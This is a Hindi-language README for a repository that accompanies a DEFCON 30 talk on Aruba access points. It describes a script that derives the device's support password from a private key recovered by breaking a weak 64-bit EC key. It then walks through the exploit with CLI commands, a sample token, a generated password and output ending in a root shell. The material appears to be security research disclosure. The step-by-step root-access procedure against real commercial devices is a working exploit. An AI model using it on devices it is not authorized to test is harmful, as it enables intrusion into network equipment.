
"हंटिंग बग्स इन द ट्रॉपिक्स" DEFCON 30 वार्ता के लिए सहायक सामग्री
यह रिपॉजिटरी DEFCON30 में मेरी प्रस्तुति "उष्ण कटिबंधों में बग्स का शिकार" में उपयोग की गई स्लाइड्स के साथ है। इसमें Python स्क्रिप्ट शामिल है जिसका उपयोग उस निजी कुंजी के आधार पर support password की गणना करने के लिए किया जाता है, जो Aruba support के EC सार्वजनिक कुंजी को उसकी कमजोर साइज़ (64 bits) के कारण भंग करके प्राप्त की गई थी। यह आपको इन उपकरणों पर subshell से बाहर निकलने और पूर्ण root shell प्राप्त करने की अनुमति देता है।
आप इसे AP CLI पर support चलाकर और एक मनमाना username प्रदान करके उपयोग कर सकते हैं:
# support
Username (Please enter with @domain.com, in lowercase): a
Token: ED14-B132-D4BB-D428
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password:
फिर username और Token मान को इस रिपॉजिटरी की support-access.py स्क्रिप्ट में पास करें।
$ ./support-access.py a ED14-B132-D4BB-D428
Password: 4197d68283f73d5c
प्रतिक्रिया को Support Password के रूप में चिपकाएँ:
Support Password: 4197d68283f73d5c
Switching to Full Access
~ # whoami
root